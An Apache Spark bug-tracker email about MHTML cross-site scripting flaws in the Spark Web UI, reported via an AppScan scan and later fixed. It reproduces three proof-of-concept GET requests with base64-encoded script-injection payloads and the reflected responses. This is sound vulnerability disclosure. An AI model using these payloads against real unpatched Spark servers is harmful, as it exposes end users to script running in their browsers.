You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@spark.apache.org by "Sean Owen (JIRA)" <ji...@apache.org> on 2017/05/10 10:55:05 UTC
[jira] [Assigned] (SPARK-20393) Strengthen Spark to prevent XSS
vulnerabilities
[ https://issues.apache.org/jira/browse/SPARK-20393?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sean Owen reassigned SPARK-20393:
---------------------------------
Assignee: Nicholas Marion
Labels: security (was: newbie security)
Priority: Minor (was: Major)
> Strengthen Spark to prevent XSS vulnerabilities
> -----------------------------------------------
>
> Key: SPARK-20393
> URL: https://issues.apache.org/jira/browse/SPARK-20393
> Project: Spark
> Issue Type: Bug
> Components: Web UI
> Affects Versions: 1.5.2, 2.0.2, 2.1.0
> Reporter: Nicholas Marion
> Assignee: Nicholas Marion
> Priority: Minor
> Labels: security
> Fix For: 2.3.0
>
>
> Using IBM Security AppScan Standard, we discovered several easy to recreate MHTML cross site scripting vulnerabilities in the Apache Spark Web GUI application and these vulnerabilities were found to exist in Spark version 1.5.2 and 2.0.2, the two levels we initially tested. Cross-site scripting attack is not really an attack on the Spark server as much as an attack on the end user, taking advantage of their trust in the Spark server to get them to click on a URL like the ones in the examples below. So whether the user could or could not change lots of stuff on the Spark server is not the key point. It is an attack on the user themselves. If they click the link the script could run in their browser and comprise their device. Once the browser is compromised it could submit Spark requests but it also might not.
> https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/
> {quote}
> Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
> _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
> HTTP/1.1
> Excerpt from response: <div class="row-fluid">No running application with ID Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> </div>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
> k.pageSize=100 HTTP/1.1
> Excerpt from response: Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
> eLength=0 HTTP/1.1
> Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
> Type: multipart/related; boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> {quote}
> security@apache was notified and recommended a PR.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org